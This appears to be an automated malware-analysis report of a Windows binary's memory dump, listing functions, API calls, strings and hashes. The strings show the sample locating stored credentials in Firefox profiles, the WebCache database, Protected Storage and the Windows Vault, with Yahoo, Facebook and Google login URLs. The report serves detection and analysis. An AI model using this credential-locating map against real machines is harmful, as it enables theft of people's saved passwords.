APIs

memset.MSVCRT ref: 0040FC85
??2@YAPAXI@Z.MSVCRT ref: 0040FCBB
??2@YAPAXI@Z.MSVCRT ref: 0040FCF9
DeleteObject.GDI32(?), ref: 0040FD36
GetModuleHandleW.KERNEL32(00000000), ref: 0040FD7E
LoadIconW.USER32(00000000,00000065), ref: 0040FD87

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@$DeleteHandleIconLoadModuleObjectmemset
String ID:
API String ID: 3532479477-0
Opcode ID: 14c3c2aa7062e08bf63dc7d5d281a39e77aead53937f861c87ecd8ed2eee7028
Instruction ID: 6b7a5e441d588d9bc54ea64e01ff161f986e35cd5d296fb942180f783725d529
Opcode Fuzzy Hash: 14c3c2aa7062e08bf63dc7d5d281a39e77aead53937f861c87ecd8ed2eee7028
Instruction Fuzzy Hash: EA315EB19013888FDB30EF668C896CAB6E9BF45314F00863FE84DDB641DBB946448B59

Uniqueness

Uniqueness Score: -1.00%

Function 00410C87, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410CA3
memset.MSVCRT ref: 00410CB8

Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592

Part of subcall function 00407DD1: wcslen.MSVCRT ref: 00407DD2
Part of subcall function 00407DD1: wcscat.MSVCRT ref: 00407DEA

wcscat.MSVCRT ref: 00410CE1

Part of subcall function 00414558: memset.MSVCRT ref: 004145B1
Part of subcall function 00414558: RegCloseKey.ADVAPI32(?), ref: 00414618
Part of subcall function 00414558: wcscpy.MSVCRT ref: 00414626

wcscat.MSVCRT ref: 00410D0A

Strings

Mozilla\Profiles, xrefs: 00410CDB
Mozilla\Firefox\Profiles, xrefs: 00410D04

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
API String ID: 1534475566-1174173950
Opcode ID: 86b2fee5573bc67bc9087b08d08cdc2ad0ccfef1d6009a232684216d2b924b41
Instruction ID: 1b820a25e8b0a88a2df896ef0368420f7b9c24777a221978b2b2a3cd549cec0e
Opcode Fuzzy Hash: 86b2fee5573bc67bc9087b08d08cdc2ad0ccfef1d6009a232684216d2b924b41
Instruction Fuzzy Hash: 860152B294031C76EB20AB668C86EDB762C9F85358F0141AAB618B7142D97C9DC44AAD

Uniqueness

Uniqueness Score: -1.00%

Function 004034E3, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

Part of subcall function 0040B1BF: free.MSVCRT(00000000,00410160,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040B1C6

Part of subcall function 00411E4C: memset.MSVCRT ref: 00411EC2
Part of subcall function 00411E4C: wcsrchr.MSVCRT ref: 00411EDB

Part of subcall function 00411BB2: SetCurrentDirectoryW.KERNEL32(?,?,?,00403557,?), ref: 00411BFF

memset.MSVCRT ref: 004035BC
memcpy.MSVCRT ref: 004035D0
wcscmp.MSVCRT ref: 004035F8
_wcsicmp.MSVCRT ref: 0040362F

Strings

, xrefs: 0040350C

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$CurrentDirectory_wcsicmpfreememcpywcscmpwcsrchr
String ID:
API String ID: 1763786148-3916222277
Opcode ID: 09aee775218a621ff1fef0c9153cb1cfdc5fccf2e7c31d726b2849875dfa8a1e
Instruction ID: bd143a35ad5b1b32f57d6bfe9876d60f7f1e4d0a05a181755c1d953110edcb1c
Opcode Fuzzy Hash: 09aee775218a621ff1fef0c9153cb1cfdc5fccf2e7c31d726b2849875dfa8a1e
Instruction Fuzzy Hash: 24412A71D40229AADF20EFA5CC45ADEB7B8AF44318F1044ABE508B3241DB789B858F59

Uniqueness

Uniqueness Score: -1.00%

Function 00414558, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004144AB: LoadLibraryW.KERNEL32(shell32.dll,0040FF7C,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 004144B9
Part of subcall function 004144AB: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004144CE

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
memset.MSVCRT ref: 004145B1
RegCloseKey.ADVAPI32(?), ref: 00414618
wcscpy.MSVCRT ref: 00414626

Part of subcall function 004083A1: GetVersionExW.KERNEL32(00452E28,0000001A,00414579), ref: 004083BB

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004145CC, 004145DC

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersionmemsetwcscpy
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 2699640517-2036018995
Opcode ID: 1f48f7e9f744942bfd9fbef0cf09dbb4d3108d1291aa30ec74452a86fee1161f
Instruction ID: e12ff53167afe07261100608862af2d586d512a8c684a17975878dc8bda8b34c
Opcode Fuzzy Hash: 1f48f7e9f744942bfd9fbef0cf09dbb4d3108d1291aa30ec74452a86fee1161f
Instruction Fuzzy Hash: 42112B71800214BBEF20A759CC4EAEFB3BDDB85754F6100A7F914A2151E62C5FC5869E

Uniqueness

Uniqueness Score: -1.00%

Function 00413CFB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00413D15
_snwprintf.MSVCRT ref: 00413D3A
WritePrivateProfileStringW.KERNEL32(?,?,?,0044BCA0), ref: 00413D58
GetPrivateProfileStringW.KERNEL32 ref: 00413D70

Strings

"%s", xrefs: 00413D29

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: PrivateProfileString$Write_snwprintfwcschr
String ID: "%s"
API String ID: 1343145685-3297466227
Opcode ID: 02edbd4849e356a2dd53856aa56349abaee77aee134cad8029ffbeba199e4c17
Instruction ID: 73e04fdb7293ad0563e201354ce1ff8293903967f03a71563bfd8de655adbfaf
Opcode Fuzzy Hash: 02edbd4849e356a2dd53856aa56349abaee77aee134cad8029ffbeba199e4c17
Instruction Fuzzy Hash: 2401AD3240521EBBEF229F91EC45FDB3B6AFF04745F14806ABA1854062D779C660DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041337C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,0041357A,00000000,?,?,?,?,00000000,?), ref: 0041338D
GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 004133A7
GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,0041357A,00000000,?,?,?,?,00000000,?), ref: 004133CA

Strings

GetProcessTimes, xrefs: 00413397
kernel32.dll, xrefs: 00413388

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressHandleModuleProcProcessTimes
String ID: GetProcessTimes$kernel32.dll
API String ID: 1714573020-3385500049
Opcode ID: 309a91ae3d39bfd2be00db52258639a55574cbf10b15d42bee79424e3042c4b9
Instruction ID: da68f8d270a38a3c71bb0a1d73356e5427966c5ec0fa45e2ea30989c2ad8b33c
Opcode Fuzzy Hash: 309a91ae3d39bfd2be00db52258639a55574cbf10b15d42bee79424e3042c4b9
Instruction Fuzzy Hash: 41F01535140208AFEF108F91EC44B9A7BA9AB08B86F404026FE18C1162CB75DAA0DB5C

Uniqueness

Uniqueness Score: -1.00%

Function 0041EAC1, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 0041EB1E
memcmp.MSVCRT ref: 0041EB49
memcmp.MSVCRT ref: 0041EBB5

Strings

SQLite format 3, xrefs: 0041EB3C
@ , xrefs: 0041EBAF

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcmp
String ID: @ $SQLite format 3
API String ID: 1475443563-3708268960
Opcode ID: 9e57e3796a850d6adbd0e3ed440c1139a18f0d6e707d690eb2e825c2f4dd1757
Instruction ID: 378f5b88a64b421c164fea27eec5394a6c1f6cf5fd0cfe57e22cb817cc3972c5
Opcode Fuzzy Hash: 9e57e3796a850d6adbd0e3ed440c1139a18f0d6e707d690eb2e825c2f4dd1757
Instruction Fuzzy Hash: 4E51C1B59002059BDF14DF6AC8817DAB7F4AF54314F15019BEC04EB34AE778EA85CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00409EB7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00409A23: OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409A98
Part of subcall function 00409A23: GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00409AB7
Part of subcall function 00409A23: DuplicateHandle.KERNEL32(00000000,00000104,00000000), ref: 00409AC4
Part of subcall function 00409A23: GetFileSize.KERNEL32(00000000,00000000), ref: 00409AD9
Part of subcall function 00409A23: CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00409B03
Part of subcall function 00409A23: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 00409B18
Part of subcall function 00409A23: WriteFile.KERNEL32(?,00000000,00000104,0040A0FE,00000000), ref: 00409B33
Part of subcall function 00409A23: UnmapViewOfFile.KERNEL32(00000000), ref: 00409B3A
Part of subcall function 00409A23: CloseHandle.KERNEL32(?), ref: 00409B43

CloseHandle.KERNEL32(000000FF,000000FF,00000000,?,0040A0FE,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409F87

Part of subcall function 00409CB0: memset.MSVCRT ref: 00409D85
Part of subcall function 00409CB0: wcschr.MSVCRT ref: 00409DBD
Part of subcall function 00409CB0: memcpy.MSVCRT ref: 00409DF1

DeleteFileW.KERNEL32(?,?,0040A0FE,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409FA8
CloseHandle.KERNEL32(000000FF,?,0040A0FE,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409FCF

Part of subcall function 00409B7A: memset.MSVCRT ref: 00409BC2
Part of subcall function 00409B7A: _snwprintf.MSVCRT ref: 00409C5C
Part of subcall function 00409B7A: free.MSVCRT(000000FF,?,000000FF,00000000,00000104,747DF560), ref: 00409C90

Strings

Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 00409EC7

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
String ID: Microsoft\Windows\WebCache\WebCacheV01.dat
API String ID: 1979745280-1514811420
Opcode ID: eeb481b1dff4e993c2893e9f0026ff803c1a702ff2030c6be45b7232c18bb5a2
Instruction ID: 3f51e9d3f4722dee63ca69fa5b044a2e48b650b6030bfe0f748ec1b1a5da80f7
Opcode Fuzzy Hash: eeb481b1dff4e993c2893e9f0026ff803c1a702ff2030c6be45b7232c18bb5a2
Instruction Fuzzy Hash: 65311CB1C006589BCF60DFA5CD855CDF7B8AF40314F1002AB9519F31A2DB755E858F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040E903, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 0040E924
qsort.MSVCRT ref: 0040E9CE

Strings

/sort, xrefs: 0040E91F
/nosort, xrefs: 0040E984

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _wcsicmpqsort
String ID: /nosort$/sort
API String ID: 1579243037-1578091866
Opcode ID: c14f26a3bd4bd4d31eab25ef7948187d43d10632211a5499f155237dcc845ca2
Instruction ID: da88191f08b8b868428b3ed71d9c82d207ce8b6ace4e6628c3e2187065429015
Opcode Fuzzy Hash: c14f26a3bd4bd4d31eab25ef7948187d43d10632211a5499f155237dcc845ca2
Instruction Fuzzy Hash: 7521F271700502AFD714FF36C981A5AB3A9FF95304B01097FE459A72D2CB7ABC218B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADD0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00413ACB: FreeLibrary.KERNELBASE(?,0040ADDC), ref: 00413AD7

LoadLibraryW.KERNELBASE(pstorec.dll), ref: 0040ADE1
GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 0040ADF4

Strings

PStoreCreateInstance, xrefs: 0040ADEE
pstorec.dll, xrefs: 0040ADDC

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: PStoreCreateInstance$pstorec.dll
API String ID: 145871493-2881415372
Opcode ID: fdc831568e2784af9de8c5a906fe078fe08317c6051ed8042a8c169ffd09e9de
Instruction ID: 165486c3e6602412b12b5041488cd1e6311a4fd56e7abe132b6c53b1702dbca2
Opcode Fuzzy Hash: fdc831568e2784af9de8c5a906fe078fe08317c6051ed8042a8c169ffd09e9de
Instruction Fuzzy Hash: D8F0E2302807125BEB206F76DC06B9B32D8AF44B4AF10C43EA052D55C1EBBCD4808B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00444E7A, Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 00444E84
??3@YAXPAX@Z.MSVCRT ref: 00444E94
??3@YAXPAX@Z.MSVCRT ref: 00444EA4
??3@YAXPAX@Z.MSVCRT ref: 00444EB4

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 6dc2ae8407accaec33e914c995c073318a836f74cf280773562707ce9086f27d
Instruction ID: 83d98c8e739894f4f11ae52403c2f1a0732df397c2cb69f7507dcdbda06e161a
Opcode Fuzzy Hash: 6dc2ae8407accaec33e914c995c073318a836f74cf280773562707ce9086f27d
Instruction Fuzzy Hash: F7E04DA070030136BB20AFBAFD44B0323CC3A90793326482FB406D73D2EE2CE840A52C

Uniqueness

Uniqueness Score: -1.00%

Function 0043A0F8, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 967COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0043A13B
memset.MSVCRT ref: 0043A4E4

Strings

only a single result allowed for a SELECT that is part of an expression, xrefs: 0043A1CA

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset
String ID: only a single result allowed for a SELECT that is part of an expression
API String ID: 2221118986-1725073988
Opcode ID: a02f6a0a02fcd16c7aa4dd96e86c2c528519a914f69e8e6aa23dcbcbdf6080a7
Instruction ID: e3eeb75a8af282f970fbf78469263b11f6465a284568bf7e48a5e115ce459d1a
Opcode Fuzzy Hash: a02f6a0a02fcd16c7aa4dd96e86c2c528519a914f69e8e6aa23dcbcbdf6080a7
Instruction Fuzzy Hash: F1828771A00208AFDF24DF69C881AAE7BA1FF08314F14411AFD559B3A2D77AEC51CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040B25F, Relevance: 5.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 0040B299
??2@YAPAXI@Z.MSVCRT ref: 0040B2B7
??2@YAPAXI@Z.MSVCRT ref: 0040B2D5
??2@YAPAXI@Z.MSVCRT ref: 0040B2F3

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 7383806280aca4e1821e19982c5cfbbe854b0cbcf0857156c862d8a82c6a6e7a
Instruction ID: 41d6ca53bbc25777d15e7d44d7af272a9a829ad4135043ac9a1f5f7c0c786f2e
Opcode Fuzzy Hash: 7383806280aca4e1821e19982c5cfbbe854b0cbcf0857156c862d8a82c6a6e7a
Instruction Fuzzy Hash: ED0112F12023007FEB69DF38ED1772A66949B95393F00413FA506CD2F6EA79D5449B08

Uniqueness

Uniqueness Score: -1.00%

Function 004444B7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 004443B0: LoadLibraryW.KERNELBASE(vaultcli.dll,?,00000000), ref: 004443BD
Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 004443D2
Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 004443DF
Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 004443EC
Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultFree), ref: 004443F9
Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultGetInformation), ref: 00444406
Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00444414
Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0044441D

memcmp.MSVCRT ref: 0044455D

Strings

8, xrefs: 00444523
$, xrefs: 00444531

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoadmemcmp
String ID: $$8
API String ID: 2708812716-435121686
Opcode ID: 201099f9feb607c4c8b0fa66378feea82f4e3e51204f541575a2dd3d377ec3c8
Instruction ID: 4b210d59022fde833576912f2e87238d6fd1d6b03e73e285368f71a5ac649bda
Opcode Fuzzy Hash: 201099f9feb607c4c8b0fa66378feea82f4e3e51204f541575a2dd3d377ec3c8
Instruction Fuzzy Hash: 73411171E00609ABEF10DF95C981BAFB7F4AF88714F11055AE915B3341DB78AE448BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7DA, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 00403C2A: LoadLibraryW.KERNEL32(advapi32.dll,?,0040A9C2,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,00411E75,?,?), ref: 00403C35
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00403C49
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00403C55
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00403C61
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403C6D
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403C79
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00403C85

wcslen.MSVCRT ref: 0040A819
memset.MSVCRT ref: 0040A898

Strings

P5@, xrefs: 0040A850

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoadmemsetwcslen
String ID: P5@
API String ID: 1960736289-1192260740
Opcode ID: 20a957c6aa2ccba46100227cc7926e2e9aca7a542005eb85cce3c7ff41f048fe
Instruction ID: 9cce22c2db06112b06b017d7de527652cc15472bfd2168745658b7e1f8ccbd38
Opcode Fuzzy Hash: 20a957c6aa2ccba46100227cc7926e2e9aca7a542005eb85cce3c7ff41f048fe
Instruction Fuzzy Hash: CC31D272500208AFDF10EFA4CC85DEE77B9AF48304F15887AF505F7281D638AE198B66

Uniqueness

Uniqueness Score: -1.00%

Function 00416F08, Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416E8B: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00416EAC
Part of subcall function 00416E8B: GetLastError.KERNEL32 ref: 00416EBD
Part of subcall function 00416E8B: GetLastError.KERNEL32 ref: 00416EC3

ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00416F38
GetLastError.KERNEL32 ref: 00416F42

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$File$PointerRead
String ID:
API String ID: 839530781-0
Opcode ID: 3e8702d37d071127fc233bfbf67a625d2feb83188ba54958d653ceabaac702fa
Instruction ID: add61fd64035c303a46c69afbbac6c0b4560a134b5de48ff3df98cfac7bf87f9
Opcode Fuzzy Hash: 3e8702d37d071127fc233bfbf67a625d2feb83188ba54958d653ceabaac702fa
Instruction Fuzzy Hash: 2D01AD3A208208BBEB108F65EC45FEA3B6CEF053A4F114426F908C6250D724EC9186E9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A37F, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

Strings

*.*, xrefs: 0040A3AA
index.dat, xrefs: 0040A3E3

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcslen$FileFindFirst
String ID: *.*$index.dat
API String ID: 1858513025-2863569691
Opcode ID: 9238a7d079e1375fbfde003b790de4053d9ee43c5394c8ca1f03ef328d3985c3
Instruction ID: 18b6580ac0a830e75170eb0e1623f763ef95ee80692c464e75bb199377268105
Opcode Fuzzy Hash: 9238a7d079e1375fbfde003b790de4053d9ee43c5394c8ca1f03ef328d3985c3
Instruction Fuzzy Hash: 20016D7140526859EB20EA61DC42ADE726CAF04304F5001BBA818F21C2EB789F929F5A

Uniqueness

Uniqueness Score: -1.00%

Function 00416E8B, Relevance: 4.5, APIs: 3, Instructions: 30COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00416EAC
GetLastError.KERNEL32 ref: 00416EBD
GetLastError.KERNEL32 ref: 00416EC3

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 850b182fd2585f694b2736305c6ca07a69ca9fa842c0c1da9be3e232dd73cee9
Instruction ID: 37b1e2f091545ca96408f8d6a34600ec4a403a46a608ba1f9fdc83bbdb8077e2
Opcode Fuzzy Hash: 850b182fd2585f694b2736305c6ca07a69ca9fa842c0c1da9be3e232dd73cee9
Instruction Fuzzy Hash: F4F06536914619BBCF009F74DC009EA7BE8EB05361B104726F832D62D1E731EE419A94

Uniqueness

Uniqueness Score: -1.00%

Function 004080AC, Relevance: 3.8, APIs: 3, Instructions: 38COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 004080C8
memcpy.MSVCRT ref: 004080E0
free.MSVCRT(00000000,00000000,?,00408F0C,00000002,?,00000000,?,0040923F,00000000,?,00000000), ref: 004080E9

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: freemallocmemcpy
String ID:
API String ID: 3056473165-0
Opcode ID: b35ef3f807938d4c0a098e15bd5b29d1098e3b6b761d1f171dd30fe06938ab32
Instruction ID: 78eaf63d8c2f3f9895426ca65e1500e544e2a4a90d5a49d0f549448db46f5a47
Opcode Fuzzy Hash: b35ef3f807938d4c0a098e15bd5b29d1098e3b6b761d1f171dd30fe06938ab32
Instruction Fuzzy Hash: 50F0E2726052229FD718EE75BA8180BB39DAF85364712883FF444E3282DF3C9C44C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00436ADD, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 242COMMON

Download Yara Rule

Strings

d, xrefs: 00436C9D

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 8f68736b9ba4cd7c518547f9ab017183f137d2356596a6fc2c566f3b6748bc1b
Instruction ID: fc4515617b89e60a19d50c15f4f69ae244da8edec6c232cce581781c6edd6396
Opcode Fuzzy Hash: 8f68736b9ba4cd7c518547f9ab017183f137d2356596a6fc2c566f3b6748bc1b
Instruction Fuzzy Hash: 5981B031608312AFCB10DF19D84165FBBE0EF88718F12992FF8949B251D778DA45CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041E7EE, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041E89C

Strings

BINARY, xrefs: 0041E7FA

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset
String ID: BINARY
API String ID: 2221118986-907554435
Opcode ID: d19efc801e877f0ce795817df0e0cc72f0fc1a5f5a7d27e56dc3ca5837767e46
Instruction ID: 80603cce4df8086f4253f53369ac634731a2704b4a2dc635bb3c7b15e71801b6
Opcode Fuzzy Hash: d19efc801e877f0ce795817df0e0cc72f0fc1a5f5a7d27e56dc3ca5837767e46
Instruction Fuzzy Hash: B951AD75A043459FDB21DF2AC881BEA7BE4EF48350F14446AEC89CB341D738D980CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040DD37, Relevance: 3.1, APIs: 2, Instructions: 140COMMON

Download Yara Rule

APIs

Part of subcall function 0040C513: ??2@YAPAXI@Z.MSVCRT ref: 0040C534
Part of subcall function 0040C513: ??3@YAXPAX@Z.MSVCRT ref: 0040C5FB

GetStdHandle.KERNEL32(000000F5,?,0040FF40,00000000,00000000,?,00000000,00000000,00000000), ref: 0040DD6C
FindCloseChangeNotification.KERNELBASE(00000000,?,0040FF40,00000000,00000000,?,00000000,00000000,00000000), ref: 0040DE90

Part of subcall function 00407D94: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040DD67,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000), ref: 00407DA6

Part of subcall function 00407DF4: GetLastError.KERNEL32(00000000,?,0040DEA5,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000,00000000), ref: 00407E08
Part of subcall function 00407DF4: _snwprintf.MSVCRT ref: 00407E35
Part of subcall function 00407DF4: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00407E4E

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
String ID:
API String ID: 1161345128-0
Opcode ID: 3d3b21ef697afd0bdb833f204540dd718a0a6addb83a3789607b508d28bd4cbe
Instruction ID: 75199abba107ca30350ead5857dca6b94cadfdfaeaa302ec2f3d27d1e62cce92
Opcode Fuzzy Hash: 3d3b21ef697afd0bdb833f204540dd718a0a6addb83a3789607b508d28bd4cbe
Instruction Fuzzy Hash: BD417F35E00604EBCB219FA9C885A5EB7B6AF54714F20406FF446AB2D1CB389E44DA99

Uniqueness

Uniqueness Score: -1.00%

Function 0040FE76, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 0040FEC3

Strings

/stext, xrefs: 0040FEBE

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _wcsicmp
String ID: /stext
API String ID: 2081463915-3817206916
Opcode ID: a01bfb8d808dbe57cbee4fd70ed2a4dbf1f3eb0a587578e83f1d012f6d402b9a
Instruction ID: 2161babe09ea1c109a016804ff5c091d56ac672142073ac0305c405afa28cd18
Opcode Fuzzy Hash: a01bfb8d808dbe57cbee4fd70ed2a4dbf1f3eb0a587578e83f1d012f6d402b9a
Instruction Fuzzy Hash: 37216074B00205AFD714EFAAC881A9DB7A9FF84304F1001BFA415A7782DB79AD148B95

Uniqueness

Uniqueness Score: -1.00%

Function 00414C1D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00414C2C

Strings

failed to allocate %u bytes of memory, xrefs: 00414C46

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

